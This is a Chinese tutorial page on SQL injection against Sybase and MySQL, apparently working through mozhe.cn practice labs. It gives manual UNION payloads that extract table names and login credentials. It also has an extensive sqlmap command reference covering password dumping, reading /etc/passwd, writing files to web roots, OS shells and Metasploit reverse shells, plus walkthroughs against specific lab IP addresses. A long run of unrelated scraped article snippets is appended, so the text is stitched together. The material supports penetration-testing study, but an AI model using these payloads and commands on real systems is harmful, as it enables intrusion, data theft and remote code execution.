web安全sql注入Sybase&Mysql&Sqlmap

Sybase联合注入

Sybase数据库介绍：Sybase是美国Sybase公司研制的一种关系型数据库系统，是一种典型的UNIX或WindowsNT平台上客户机/服务器环境下的大型数据库系统。

靶场：https://www.mozhe.cn/bug/detail/88

还是老样子 and 1=1，and 1=2 判断注入，order by判断列数，列数有4列

同Oracle数据库，猜显位，
union all select ‘null’,null,null,null
union all select null,‘null’,null,null
union all select null,null,‘null’,null
union all select null,null,null,‘null’

这里在第二个null的时候回显了

猜数据库名，用db_name() 来获取数据库
-1 union all select null,db_name(),null,null //mozhe_Deepthroat
-1 union all select null,db_name(0),null,null //master
-1 union all select null,db_name(2),null,null //tempdb
-1 union all select null,db_name(3),null,null //model

猜列名，dbo.sysobjects：存储表名
-1 union all select null,name,null,null from mozhe_Deepthroat.dbo.sysobjects //Deepthroat_login
-1 union all select null,name,null,null from mozhe_Deepthroat.dbo.sysobjects where name<>‘Deepthroat_login’ //notice
-1 union all select null,name,null,null from mozhe_Deepthroat.dbo.sysobjects where name<>‘Deepthroat_login’ and name<>‘sysalternates’ //sysalternates
-1 union all select null,name,null,null from mozhe_Deepthroat.dbo.sysobjects where name<>‘Deepthroat_login’ and name<>‘notice’ and name<>‘sysalternates’ //sysattributes

获取Deepthroat_login列名信息，dbo.syscolumns来获取字段
-1 union all select null,name,null,null from mozhe_Deepthroat.dbo.syscolumns //uid
-1 union all select null,name,null,null from mozhe_Deepthroat.dbo.syscolumns where name<>‘uid’ //type
-1 union all select null,name,null,null from mozhe_Deepthroat.dbo.syscolumns where name<>‘uid’ and name<>‘type’ //id

这样爆字段的话有点费时间，所以我们可以选择绑定表名，where id=object_id(‘Deepthroat_login’)

union all select null,name,null,null from mozhe_Deepthroat.dbo.syscolumns where id=object_id(‘Deepthroat_login’)//id
union all select null,name,null,null from mozhe_Deepthroat.dbo.syscolumns where id=object_id(‘Deepthroat_login’) and name<>‘id’ //name
-1 union all select null,name,null,null from mozhe_Deepthroat.dbo.syscolumns where id=object_id(‘Deepthroat_login’) and name<>‘id’ and name<>‘name’ //password

获取数据
-1 union all select null,name,null,null from Deepthroat_login //zhang
-1 union all select null,name,null,null from Deepthroat_login where name<>‘zhang’ //mozhe
-1 union all select null,password,null,null from Deepthroat_login //zhang&password
-1 union all select null,password,null,null from Deepthroat_login where name<>‘zhang’ //mozhe&password

最后拿到密码MD5解密进入后台

SQLMAP-下载&安装&使用&说明

python官网下载地址：https://www.python.org/downloads/
sqlmap下载地址：https://github.com/sqlmapproject/sqlmap
sqlmap 的源码学习笔记一之目录结构：https://blog.csdn.net/qq_21500173/article/details/53648696

sqlmap简介
sqlmap支持MySQL, Oracle,PostgreSQL, Microsoft SQL Server, Microsoft Access, IBM DB2, SQLite, Firebird,Sybase和SAP MaxDB等数据库的各种安全漏洞检测。

sqlmap支持五种不同的注入模式：
l 基于布尔的盲注，即可以根据返回页面判断条件真假的注入；

l 基于时间的盲注，即不能根据页面返回内容判断任何信息，用条件语句查看时间延迟语句是否执行（即页面返回时间是否增加）来判断；

l 基于报错注入，即页面会返回错误信息，或者把注入的语句的结果直接返回在页面中；

l 联合查询注入，可以使用union的情况下的注入；

l 堆查询注入，可以同时执行多条语句的执行时的注入。

sqlmap&Tamper目录
Tamper目录包含了65种的绕过脚本，例如编码绕过、注释绕过等。

sqlmap超详细笔记+思维导图：https://www.cnblogs.com/bmjoker/p/9326258.html

基本操作笔记：-u  #注入点 
-f  #指纹判别数据库类型 
-b  #获取数据库版本信息 
-p  #指定可测试的参数(?page=1&id=2 -p "page,id") 
-D ""  #指定数据库名 
-T ""  #指定表名 
-C ""  #指定字段 
-s ""  #保存注入过程到一个文件,还可中断，下次恢复在注入(保存：-s "xx.log"　　恢复:-s "xx.log" --resume) 
--level=(1-5) #要执行的测试水平等级，默认为1 
--risk=(0-3)  #测试执行的风险等级，默认为1 
--time-sec=(2,5) #延迟响应，默认为5 
--data #通过POST发送数据 
--columns        #列出字段 
--current-user   #获取当前用户名称 
--current-db     #获取当前数据库名称 
--users          #列数据库所有用户 
--passwords      #数据库用户所有密码 
--privileges     #查看用户权限(--privileges -U root) 
-U               #指定数据库用户 
--dbs            #列出所有数据库 
--tables -D ""   #列出指定数据库中的表 
--columns -T "user" -D "mysql"      #列出mysql数据库中的user表的所有字段 
--dump-all            #列出所有数据库所有表 
--exclude-sysdbs      #只列出用户自己新建的数据库和表 
--dump -T "" -D "" -C ""   #列出指定数据库的表的字段的数据(--dump -T users -D master -C surname) 
--dump -T "" -D "" --start 2 --top 4  # 列出指定数据库的表的2-4字段的数据 
--dbms    #指定数据库(MySQL,Oracle,PostgreSQL,Microsoft SQL Server,Microsoft Access,SQLite,Firebird,Sybase,SAP MaxDB) 
--os      #指定系统(Linux,Windows) 
-v  #详细的等级(0-6) 
    0：只显示Python的回溯，错误和关键消息。 
    1：显示信息和警告消息。 
    2：显示调试消息。 
    3：有效载荷注入。 
    4：显示HTTP请求。 
    5：显示HTTP响应头。 
    6：显示HTTP响应页面的内容 
--privileges  #查看权限 
--is-dba      #是否是数据库管理员 
--roles       #枚举数据库用户角色 
--udf-inject  #导入用户自定义函数（获取系统权限） 
--union-check  #是否支持union 注入 
--union-cols #union 查询表记录 
--union-test #union 语句测试 
--union-use  #采用union 注入 
--union-tech orderby #union配合order by 
--data "" #POST方式提交数据(--data "page=1&id=2") 
--cookie "用;号分开"      #cookie注入(--cookies=”PHPSESSID=mvijocbglq6pi463rlgk1e4v52; security=low”) 
--referer ""     #使用referer欺骗(--referer "http://www.baidu.com") 
--user-agent ""  #自定义user-agent 
--proxy "http://127.0.0.1:8118" #代理注入 
--string=""    #指定关键词,字符串匹配. 
--threads 　　  #采用多线程(--threads 3) 
--sql-shell    #执行指定sql命令 
--sql-query    #执行指定的sql语句(--sql-query "SELECT password FROM mysql.user WHERE user = 'root' LIMIT 0, 1" ) 
--file-read    #读取指定文件 
--file-write   #写入本地文件(--file-write /test/test.txt --file-dest /var/www/html/1.txt;将本地的test.txt文件写入到目标的1.txt) 
--file-dest    #要写入的文件绝对路径 
--os-cmd=id    #执行系统命令 
--os-shell     #系统交互shell 
--os-pwn       #反弹shell(--os-pwn --msf-path=/opt/framework/msf3/) 
--msf-path=    #matesploit绝对路径(--msf-path=/opt/framework/msf3/) 
--os-smbrelay  # 
--os-bof       # 
--reg-read     #读取win系统注册表 
--priv-esc     # 
--time-sec=    #延迟设置 默认--time-sec=5 为5秒 
-p "user-agent" --user-agent "sqlmap/0.7rc1 (http://sqlmap.sourceforge.net)"  #指定user-agent注入 
--eta          #盲注 
/pentest/database/sqlmap/txt/
common-columns.txt　　字段字典　　　 
common-outputs.txt 
common-tables.txt      表字典 
keywords.txt 
oracle-default-passwords.txt 
user-agents.txt 
wordlist.txt 

常用语句 :
1./sqlmap.py -u http://www.xxxxx.com/test.php?p=2 -f -b --current-user --current-db --users --passwords --dbs -v 0 
2./sqlmap.py -u http://www.xxxxx.com/test.php?p=2 -b --passwords -U root --union-use -v 2 
3./sqlmap.py -u http://www.xxxxx.com/test.php?p=2 -b --dump -T users -C username -D userdb --start 2 --stop 3 -v 2 
4./sqlmap.py -u http://www.xxxxx.com/test.php?p=2 -b --dump -C "user,pass"  -v 1 --exclude-sysdbs 
5./sqlmap.py -u http://www.xxxxx.com/test.php?p=2 -b --sql-shell -v 2 
6./sqlmap.py -u http://www.xxxxx.com/test.php?p=2 -b --file-read "c:\boot.ini" -v 2 
7./sqlmap.py -u http://www.xxxxx.com/test.php?p=2 -b --file-write /test/test.txt --file-dest /var/www/html/1.txt -v 2 
8./sqlmap.py -u http://www.xxxxx.com/test.php?p=2 -b --os-cmd "id" -v 1 
9./sqlmap.py -u http://www.xxxxx.com/test.php?p=2 -b --os-shell --union-use -v 2 
10./sqlmap.py -u http://www.xxxxx.com/test.php?p=2 -b --os-pwn --msf-path=/opt/framework/msf3 --priv-esc -v 1 
11./sqlmap.py -u http://www.xxxxx.com/test.php?p=2 -b --os-pwn --msf-path=/opt/framework/msf3 -v 1 
12./sqlmap.py -u http://www.xxxxx.com/test.php?p=2 -b --os-bof --msf-path=/opt/framework/msf3 -v 1 
13./sqlmap.py -u http://www.xxxxx.com/test.php?p=2 --reg-add --reg-key="HKEY_LOCAL_NACHINE\SOFEWARE\sqlmap" --reg-value=Test --reg-type=REG_SZ --reg-data=1 
14./sqlmap.py -u http://www.xxxxx.com/test.php?p=2 -b --eta 
15./sqlmap.py -u "http://192.168.136.131/sqlmap/mysql/get_str_brackets.php?id=1" -p id --prefix "')" --suffix "AND ('abc'='abc"
16./sqlmap.py -u "http://192.168.136.131/sqlmap/mysql/basic/get_int.php?id=1" --auth-type Basic --auth-cred "testuser:testpass"
17./sqlmap.py -l burp.log --scope="(www)?\.target\.(com|net|org)"
18./sqlmap.py -u "http://192.168.136.131/sqlmap/mysql/get_int.php?id=1" --tamper tamper/between.py,tamper/randomcase.py,tamper/space2comment.py -v 3 
19./sqlmap.py -u "http://192.168.136.131/sqlmap/mssql/get_int.php?id=1" --sql-query "SELECT 'foo'" -v 1 
20./sqlmap.py -u "http://192.168.136.129/mysql/get_int_4.php?id=1" --common-tables -D testdb --banner 
21./sqlmap.py -u "http://192.168.136.129/mysql/get_int_4.php?id=1" --cookie="PHPSESSID=mvijocbglq6pi463rlgk1e4v52; security=low" --string='xx' --dbs --level=3 -p "uid"

简单的注入流程 :
1.读取数据库版本，当前用户，当前数据库 
sqlmap -u http://www.xxxxx.com/test.php?p=2 -f -b --current-user --current-db -v 1 
2.判断当前数据库用户权限 
sqlmap -u http://www.xxxxx.com/test.php?p=2 --privileges -U 用户名 -v 1 
sqlmap -u http://www.xxxxx.com/test.php?p=2 --is-dba -U 用户名 -v 1 
3.读取所有数据库用户或指定数据库用户的密码 
sqlmap -u http://www.xxxxx.com/test.php?p=2 --users --passwords -v 2 
sqlmap -u http://www.xxxxx.com/test.php?p=2 --passwords -U root -v 2 
4.获取所有数据库 
sqlmap -u http://www.xxxxx.com/test.php?p=2 --dbs -v 2 
5.获取指定数据库中的所有表 
sqlmap -u http://www.xxxxx.com/test.php?p=2 --tables -D mysql -v 2 
6.获取指定数据库名中指定表的字段 
sqlmap -u http://www.xxxxx.com/test.php?p=2 --columns -D mysql -T users -v 2 
7.获取指定数据库名中指定表中指定字段的数据 
sqlmap -u http://www.xxxxx.com/test.php?p=2 --dump -D mysql -T users -C "username,password" -s "sqlnmapdb.log" -v 2 
8.file-read读取web文件 
sqlmap -u http://www.xxxxx.com/test.php?p=2 --file-read "/etc/passwd" -v 2 
9.file-write写入文件到web 
sqlmap -u http://www.xxxxx.com/test.php?p=2 --file-write /localhost/mm.php --file使用sqlmap绕过防火墙进行注入测试：

Sybase数据库&sqlmap工具注入

python sqlmap.py -u “http://219.153.49.228:48522/new_list.php?id=1” # -u + 注入地址


新手直接回车 =v=

应该是存在注入了python sqlmap.py -u “http://219.153.49.228:48522/new_list.php?id=1” --dbs # --dbs 列出所有数据库

python sqlmap.py -u “http://219.153.49.228:48522/new_list.php?id=1” --current-db # --current-db 获取当前数据库名称

python sqlmap.py -u “http://219.153.49.228:48522/new_list.php?id=1” --tables # --tables 列出所有数据库下的表

python sqlmap.py -u “http://219.153.49.228:48522/new_list.php?id=1” --tables -D “mozhe_Deepthroat” # --tables -D "" 列出指定数据库中的表
python sqlmap.py -u “http://219.153.49.228:48522/new_list.php?id=1” --columns -T “Deepthroat_login” -D “mozhe_Deepthroat” # --columns -T "user" -D "mysql" 列出mysql数据库中的user表的所有字段

Database: mozhe_Deepthroat
Table: Deepthroat_login
python sqlmap.py -u “http://219.153.49.228:48522/new_list.php?id=1” --dump -C “name,password” -T “Deepthroat_login” -D “mozhe_Deepthroat” #--dump -T "" -D "" -C "" 列出指定数据库的表的字段的数据(--dump -T users -D master -C surname)

do you want to crack them via a dictionary-based attack? //通过基于字典的攻击来破解

拿到账号和MD5加密后的密码

Mysql数据库&sqlmap工具注入

sqlmap缓存问题

python sqlmap.py -u “http://219.153.49.228:40080/new_list.php?id=1” 发现这里的数据库判断的：Sybase

python sqlmap.py -u “http://219.153.49.228:40080/new_list.php?id=1” --tables 500报错

记录当前所有注入的日志：C:\Users\Administrator\AppData\Local\sqlmap\output\219.153.49.228

为了能够注入，直接把缓存删掉再运行 python sqlmap.py -u “http://219.153.49.228:46152/new_list.php?id=1” --tables

接着同Sybase数据库注入一样，python sqlmap.py -u “http://219.153.49.228:46152/new_list.php?id=1” --current-db #当前数据库 mozhe_Discuz_StormGroup

python sqlmap.py -u “http://219.153.49.228:46152/new_list.php?id=1” --tables -D “mozhe_Discuz_StormGroup” #获取指定数据库下所有表

python sqlmap.py -u “http://219.153.49.228:46152/new_list.php?id=1” --columns -D “mozhe_Discuz_StormGroup” -T “StormGroup_member” #获取指定库名、表名下的列名

python sqlmap.py -u “http://219.153.49.228:46152/new_list.php?id=1” --dump -D “mozhe_Discuz_StormGroup” -T “StormGroup_member” -C “name,password” #获取指定库名、表名、列名下的数据

拓展知识

手工：如果遇上这种 id=MQ== 的时候就需要整体编码再注入

select * from title where id="MQ=="

select * from title where id=1

传递数据—>base64编码—>组合sql语句—>执行返回

sqlmap：python sqlmap.py -u " id=" --tamper=base64encode.py

现在学习嵌入式怎么样？华清远见成都人工智能嵌入式硬件单片机物联网
现在学习嵌入式技术仍然是一个非常好的选择，因为嵌入式系统在许多行业中都发挥着重要作用，并且随着技术的发展，其应用领域也在不断扩大。市场需求：行业应用广泛：嵌入式系统在消费电子、汽车电子、医疗设备、工业自动化、航空航天等领域都有广泛应用。新兴技术推动：物联网(IoT)、5G通信、自动驾驶等新兴技术的发展，进一步增加了对高性能、低功耗、安全可靠的嵌入式系统的需求。人才缺口：尽管近年来有很多人通过培训加
智慧城市的定义是什么？安科瑞武陈燕智慧城市人工智能
智慧城市：就是运用信息和通信技术手段感测、分析、整合城市运行核心系统的各项关键信息，从而对包括民生、环保、公共安全、城市服务、工商业活动在内的各种需求做出智能响应。其实质是利用**的信息技术，实现城市智慧式管理和运行，进而为城市中的人创造更美好的生活，促进城市的和谐、可持续成长。智慧城市体系架构自上而下分为：感知层、通讯层、数据层、应用层。智慧城市建设需要打造一个统一平台，设立城市数据*，构建三张
拼多多返现要输入身份证号码安全吗?拼单返现是什么? 古楼
当我们谈到拼多多返现金活动时，很多朋友会担心提供身份证信息的安全性以及返现金额的真实性。今天，我就来为大家揭开这些疑虑的面纱，为大家提供一个清晰的答案。【高省】APP（高佣金领导者）是一个自用省钱佣金高，分享推广赚钱多的平台，百度有几百万篇报道，运行三年，稳定可靠。高省APP，是2021年推出的平台，0投资，0风险、高省APP佣金更高，模式更好，终端用户不流失。高省是公认的返利最高的软件。古楼导师
IP SSL证书如何实现IP的https LS_云诏 tcp/ip ssl https
随着数字化进程的加速，企业越来越依赖于互联网进行日常运营。在这个过程中，确保数据的安全性和隐私成为了至关重要的任务。IPSSL证书作为一种专门针对特定IP地址的SSL证书，正逐渐成为企业保护数字资产的关键工具之一。本文将深入探讨IPSSL证书如何为您的网站提供强有力的保护，并解释为什么它是守护您数字资产的重要手段。什么是IPSSL证书？IPSSL证书是一种特殊的SSL证书类型，它专门为特定的IP地
FastAdmin 和 Dcat Admin从使用场景、适合人群、使用成本、资源完善程度、bug 解决、安全性全方位解析 man2017 资源 php 框架
下面是对FastAdmin和DcatAdmin两个框架的详细对比分析，涵盖使用场景、适合人群、使用成本、资源完善程度、bug解决、安全性等多个方面的深入探讨。使用场景FastAdmin：FastAdmin通常适用于中小型项目或初创公司的后台管理系统开发。它以轻量级著称，对于那些不需要过多复杂功能的项目来说非常合适。FastAdmin提供了一套简洁高效的代码结构和性能设计，使得开发者能够快速搭建起一
DHCP部署与防护小Z资本网安学习网络安全服务器
DHCP动态主机配置协议：获取响应的ip地址（自动分配），配置dns、网关使用udp协议（比tcp速度快）tcp安全，重传机制udp速度快dhcp服务器67dhcp客户端68手工配置（dhcp服务器将手动配置的IP地址分给客户），自动配置（客户端第一次向服务器申请ip地址，永久分配ip地址），动态配置（租约有关）DHCP报文：discover报文offerrequest：请求ip地址；租约到期ac
网安面试设备篇幅：安全准入 mingzhi61 安全网络职场和发展
吉祥知识星球http://mp.weixin.qq.com/s?__biz=MzkwNjY1Mzc0Nw==&mid=2247485367&idx=1&sn=837891059c360ad60db7e9ac980a3321&chksm=c0e47eebf793f7fdb8fcd7eed8ce29160cf79ba303b59858ba3a6660c6dac536774afb2a6330#rd《网安
内卷轮到教师了？教育部通知：今年秋天开学可能全面落实红莲少年
原创路途艰难险峻，但是有您相伴，欢迎点赞分享关注评论近几年来，随着社会竞争愈发激烈，社会各界都更加关注教育问题，其中小学作为义务教育的起始阶段，更应该被重视，而摆在家长和社会眼前的就是小学生放学后的接送问题，大多城市家长的下班时间和孩子的放学时间并不匹配，这个时间差极易导致安全隐患，广大家长都受到该问题的困扰。不同的家庭对于此种问题的解决方法各不相同，部分家庭有老人，可以摆脱老人接送、照看孩子，但
企业如何通过通配SSL证书节流 LS_云诏网络
随着互联网技术的迅猛发展，网络安全问题日益受到重视。对于拥有多个子域名的企业而言，确保每个站点都能得到有效的安全防护变得尤为重要。这时，通配符SSL证书应运而生，它不仅简化了证书管理流程，还提供了强大的加密功能。本文将深入探讨通配符SSL证书的优势以及如何利用它来实现全方位的加密保护。什么是通配符SSL证书？通配符SSL证书是一种特殊类型的SSL证书，它可以应用于一个主域名及其所有子域名上。这意味
（每日一问）计算机网络：GET请求和POST请求的区别 upgrador 备战程序员：每日一问 #计算机基础知识速成笔记 web
（每日一问）计算机网络：GET请求和POST请求的区别在Web开发中，GET请求和POST请求是最常见的两种HTTP请求方法。尽管它们在功能上有许多相似之处，但在使用场景、数据传递方式、缓存策略等方面存在显著差异。了解这些区别不仅有助于我们在开发中做出正确的选择，还能提升Web应用的性能和安全性。本文将详细探讨GET请求和POST请求的区别，并通过代码示例和表格对比，帮助读者更好地理解它们的应用场
Java中synchronized原理 angushine java 开发语言
synchronized是Java中的一个关键字，用于实现线程同步。它可以确保同一时刻只有一个线程能够访问被synchronized修饰的代码块或方法，从而保证数据的线程安全性。synchronized的原理主要基于Java虚拟机（JVM）的监视器锁（MonitorLock）机制。以下是synchronized的原理和工作流程：1、对象头在Java中，每个对象都有一个对象头（ObjectHeade
浅聊java中的枚举以及关于枚举的常见面试问题 Jack_abu java java 面试开发语言
基本概念：什么是枚举？枚举（Enum）是一种特殊的类，它用于表示一组固定的常量。枚举从Java5（也称为Java1.5）开始引入，提供了一种比传统常量（如使用publicstaticfinal定义的变量）更类型安全、更易读和更易维护的方式来定义一组常量。如何定义枚举？枚举是通过关键字enum来定义的。枚举的每一个实例都是该枚举类型的一个对象，这些对象在编译时就已经被创建，并且不能被实例化。枚举类默
安全无小事灿然简笔
真的太可怕了！最近失联事件频发，原本想着前几天报道的那起长沙县8岁女童不幸遇害案是离我最近的了，可谁曾想昨天一个消息彻底惊醒了我，让我现在都心有余悸。事情是这样的：我女儿有个好朋友，住我们家马路对面小区，她们小学同窗6年，经常一起上下学，无话不谈的那种。昨天我遇到了那女孩子的妈妈，她告诉我，她女儿前两天放学回家路上被人尾随。当时听到这个消息，我吓一大跳，要知道，那条路也是我家女儿每天上下学的必经之
2021-06-22 晓雨露非
我在有限的青春里，找到了貌似很爱我的男人。他会关心我的饮食起居，也会因我的情绪起伏，一天不联系他就觉得我不爱他，及时回复我信息，哪怕撒泡尿的小事也向我汇报，聊天聊到不想聊，朋友圈，手机屏保，都可以公开是我，也会把我归在他未来计划之内，主动给我要的安全感……他也曾放弃过，哭过，心痛过，见不得男生在我面前哭，天生的母性泛滥，真也好假也罢，就是心软了。追我也没想象中难也不用什么成本，都是些细节就与之交心
查看服务器sftp用户信息,linux查看sftp服务器配置曾喜胜 Anson 查看服务器sftp用户信息
linux查看sftp服务器配置内容精选换一换为加强对系统数据的容灾管理，云堡垒机支持配置日志备份，提高审计数据安全性和系统可扩展性。本小节主要介绍如何在系统配置FTP/SFTP服务器参数，将日志远程备份至FTP/SFTP服务器。开启远程备份后，系统默认在每天零点备份前一天的系统数据。以天为单位自动备份，生成日志文件，并上传到FTP/SFTP服务器相应路径。服务器同一路径下，不能重复云堡垒机配置了
Java多线程中的锁机制：深入解析synchronized与ReentrantLock 杰哥在此 Java系列 java 开发语言
在Java多线程编程中，锁机制是确保线程安全的关键手段。当我们需要控制多个线程对共享资源的访问时，锁可以帮助我们实现这一目标。Java提供了两种主要的锁机制：synchronized关键字和ReentrantLock接口。本文将深入解析这两种锁机制的工作原理、使用场景以及性能特点。一、synchronized关键字synchronized是Java提供的一种内置锁机制，它可以用来修饰方法或代码块。
2022-06-22 毛荣荣
危难时刻伸援手，洪水无情人有情雷声滚滚，暴雨不歇。6月20日以来，史上罕见的特大暴雨袭击佛冈县，县各个乡镇（街道）、园区严重受灾，多处村庄、农田、水利、道路被洪水冲毁，多地农村群众、社区居民在干部的积极帮助下连夜转移，人民生命财产安全遭受重大损失，灾情就是命令，雨情就是警报，时间就是生命。北江流域水位继续上涨，干流将出现超百年一遇洪峰流量，佛冈县将防汛二级应急响应提升至一级应急响应，防汛救灾形势越
孩子，你是有价值的人！宁静的天空_早起
孩子成长需要的六大心理营养，有一条是“生命的至重”，父母是孩子生命中的至重之人，父母的爱与支持是孩子安全感与自尊自爱的源头。自尊自爱的孩子，敢于接受挑战，有勇气追求独立自主。《少有人走的路》一书作者斯科特·派克说，他的父母很早就传达给他这样的信息：“不管什么时候，你都是有价值的人”，他们告诉他：“你是我们所爱的孩子，你是可爱的人。无论你做什么，无论你成为什么样的人，只要你努力而且敢于冒险，我们始终
移动硬盘设备管理有计算机里没有,我的移动硬盘在电脑的设备管理器上可以看到，但是在我的电脑里却找不? 爱问知识人... 几处笙歌移动硬盘设备管理有计算机里没有
USB不被电脑识别，如果是系统或系统自带的驱动的原因，可以按下面方法修复一下。1、开机按F8进入安全模式后在退出，选重启或关机在开机，就可以进入正常模式(修复注册表)。2、如果故障依旧，请你用系统自带的系统还原，还原到你没有出现这次故障的时候修复(如果正常模式恢复失败，请开机按F8进入到安全模式中使用系统还原)。3、如果故障依旧，使用系统盘修复，打开命令提示符输入SFC/SCANNOW回车(SFC
Cloudflare宣布适用于 Linux 的 WARP 和代理模式 t05777 其他 linux rust 运维
去年10月，我们发布了桌面版WARP，为数十亿台设备免费提供更安全、更快捷的互联网使用方式。同时，我们让企业客户能够将WARP与CloudflareforTeams相结合使用。通过WARP路由来自地球上任何地方的设备的所有企业流量，我们都能够无缝地支持高级功能，例如安全Web网关和浏览器隔离，以及未来的数据丢失防护平台。今天，我们很高兴地宣布CloudflareWARPforLinux，以及在所有
Windows 11如何删除账户 famous_pengfei 笔记本电脑电脑 windows
随着Windows11的推出，用户界面和操作系统的功能都有了新的变化。对于需要管理多个用户账户的用户来说，了解如何在新系统中添加、修改或删除账户变得尤为重要。有时出于安全考虑或个人需要，我们可能希望从Windows11中删除一个用户账户，无论是临时的访客账户还是不再使用的家庭成员账户。在这篇分享中，我将详细介绍如何在Windows11操作系统中安全地删除用户账户。从访问设置菜单到选择正确的账户进行
【读书笔记】孩子说：“你更爱她。”兄弟姐妹的争斗提供了一个训练场，可以让孩子安全地学习如何处理矛盾。我和小妮子的日常
兄弟姐妹间的争吵，是家庭生活的一部分。由于孩子的原始需求就是获取父母的关爱和保护，所以这种问题不可能完全避免。了解孩子们到底在争论什么，可以帮助你更好地做出回应、减少矛盾。场景：在决定看哪部电影时，孩子没能按照自己的心意想看什么就看什么，他说你更爱他的姐姐。妒忌和争斗会持续整个童年期，而且孩子并不会因为长大而完全摆脱这些，所以父母需要确保自己不会为此制造更多理由。兄弟姐妹间的争斗会以多种方式表现出
中原焦点团队张俊功初24、中24分享第262天挑战约练共46次（2021.6.19） 5d4750373a7c
马斯洛的层次需要理论：生理需要、安全需要、归属与爱的需要、尊重的需要、自我实现的需要。马斯洛认为，需要是有层次的，只有满足了低级需要后才会产生高级需要，最占优势的需要将支配一个人的意识和行为，高级需要出现之后，低级需要任然存在，但对行为的影响会减弱。阿尔德弗尔的ERG理论：1.生存的需要，相当于马斯洛需要层次理论生理、安全需要。2.关系的需要，相当于马斯洛层次理论的归属与爱的需要。3.成长的需要，
一杯好水,从深紫外光杀菌水杯开始碧雪初心
疫情过后，更多的人开始注重健康，开始调整生活习惯，也有更多的人开始注重喝水，水是生命之源，每日喝水关乎身体健康，随之而来水的安全问题更与我们息息相关。纵观，市面各种水质过滤设备早已粉墨登场，净化器，过滤水龙头、过滤壶、过滤杯等等，更有甚者有人根本不喝自来水，直接买来矿泉水或者纯净水作为日常饮用水。总之，人们用一切办法，只为喝到利于身体健康的纯净水。据公开资料显示，2017年—2019年全国各省超过
springboot与Spring security 靈08_1024
Springsecurity是一个安全框架，此处不作赘述。本文只写如何使用Springsecurity，以及在搭建中遇到的问题。maven依赖：org.springframework.bootspring-boot-starter-securitymvc入口页面配置文件：importorg.springframework.context.annotation.Configuration;impor
通天星CMSV6车载定位监控平台 getAlarmAppealByGuid SQL注入漏洞漏洞文库-网络安全 day漏洞挖掘漏洞复现 sql 数据库安全网络网络安全 web安全安全架构
0x01阅读须知技术文章仅供参考，此文所提供的信息只为网络安全人员对自己所负责的网站、服务器等（包括但不限于）进行检测或维护参考，未经授权请勿利用文章中的技术资料对任何计算机系统进行入侵操作。利用此文所提供的信息而造成的直接或间接后果和损失，均由使用者本人负责。本文所提供的工具仅用于学习，禁止用于其他！！！0x02产品概述通天星CMSV6车载定位监控平台拥有以位置服务、无线3G/4G视频传输、云存
优秀的网络安全工程师应该有哪些能力？零基础入门到精通，收藏这一篇就够了 leah126 渗透测试程序员编程 web安全网络安全
网络安全工程师是一个各行各业都需要的职业，工作内容属性决定了它不会只在某一方面专精，需要掌握网络维护、设计、部署、运维、网络安全等技能。目前稍有经验的薪资在10K-30K之间，全国的网络安全工程师还处于一个供不应求的状态，因此非常建议大家尝试学习一下咱们的网络安全工程师培训课程。那么，优秀的网络工程师的技术水平体现在哪些方面？1、强大的网络设计能力普通的网络安全工程师只能维护别人设计好的网络，而自
不用async与await将异步函数改为同步函数 web前端神器前端 javascript 开发语言
最近做一个项目token校验，发现之前用的插件不能加密之后可以直接解密，一点都不安全。所以换了一个插件，但是遇到了另一个问题。原本的函数是同步函数，现在换了插件之后变为了异步函数。有很多的代码都调用了这个函数，总不能每个调用该函数的地方都加await或者then。如下：functionsign(token){returnjwt.sign(token)}调用的时候为sign('aaa')而此时代码变
搭建服务器 Axiao89757 mysql java android
文章目录搭建服务器1.什么是服务器2.什么是云服务器3.什么是内网、外网4.上手搭建搭建服务器1.什么是服务器参考资料：什么是服务器简单认识一下：服务器指一个管理资源并为用户提供服务的计算机系统，通常分为文件服务器、数据库服务器和应用程序服务器。自己的理解：就是需要24小时开机、各方面都非常稳定、安全、高效的电脑，用来响应服务用户端的。2.什么是云服务器参考资料：云服务器是什么，有什么用？简单地认
河道非法采砂智能检测系统：采砂船识别监测系统索迪迈科技人工智能智慧城市车载监控录像机大数据汽车安全
一、引言随着科技的不断发展，河道非法采砂问题日益严重，不仅破坏了河床生态平衡，还危及河道沿岸人民的生命财产安全。因此，建立一个高效、智能的河道非法采砂检测系统势在必行。本文将重点介绍一种基于智能识别的河道非法采砂检测系统，特别是其中的采砂船识别监测系统。二、河道非法采砂问题的现状河道非法采砂带来的问题日趋严重。非法采砂行为往往伴随着对生态环境的破坏、河床的损害、以及可能的公共安全风险。传统的监测方
jsonp 常用util方法 hw1287789687 jsonp jsonp常用方法 jsonp callback
jsonp 常用java方法 (1)以jsonp的形式返回:函数名(json字符串) /*** * 用于jsonp调用 * @param map : 用于构造json数据 * @param callback : 回调的javascript方法名 * @param filters : <code>SimpleBeanPropertyFilter theFilt
多线程场景 alafqq 多线程
0 能不能简单描述一下你在java web开发中需要用到多线程编程的场景？0 对多线程有些了解，但是不太清楚具体的应用场景，能简单说一下你遇到的多线程编程的场景吗？ Java多线程 2012年11月23日 15:41 Young9007 Young9007 4 0 0 4 Comment添加评论关注(2) 3个答案按时间排序按投票排序 0 0 最典型的如： 1、
Maven学习——修改Maven的本地仓库路径 Kai_Ge maven
安装Maven后我们会在用户目录下发现.m2 文件夹。默认情况下，该文件夹下放置了Maven本地仓库.m2/repository。所有的Maven构件(artifact)都被存储到该仓库中，以方便重用。但是windows用户的操作系统都安装在C盘，把Maven仓库放到C盘是很危险的，为此我们需要修改Maven的本地仓库路径。
placeholder的浏览器兼容 120153216 placeholder
【前言】自从html5引入placeholder后，问题就来了，不支持html5的浏览器也先有这样的效果，各种兼容，之前考虑，今天测试人员逮住不放，想了个解决办法，看样子还行，记录一下。【原理】不使用placeholder，而是模拟placeholder的效果，大概就是用focus和focusout效果。【代码】 <scrip
debian_用iso文件创建本地apt源 2002wmj Debian
1.将N个debian-506-amd64-DVD-N.iso存放于本地或其他媒介内，本例是放在本机/iso/目录下 2.创建N个挂载点目录如下： debian:~#mkdir –r /media/dvd1 debian:~#mkdir –r /media/dvd2 debian:~#mkdir –r /media/dvd3 …. debian:~#mkdir –r /media
SQLSERVER耗时最长的SQL 357029540 SQL Server
对于DBA来说，经常要知道存储过程的某些信息： 1. 执行了多少次 2. 执行的执行计划如何 3. 执行的平均读写如何 4. 执行平均需要多少时间列名 &
com/genuitec/eclipse/j2eedt/core/J2EEProjectUtil 7454103 eclipse
今天eclipse突然报了com/genuitec/eclipse/j2eedt/core/J2EEProjectUtil 错误，并且工程文件打不开了，在网上找了一下资料，然后按照方法操作了一遍，好了，解决方法如下：错误提示信息： An error has occurred.See error log for more details. Reason: com/genuitec/
用正则删除文本中的html标签 adminjun java html 正则表达式去掉html标签
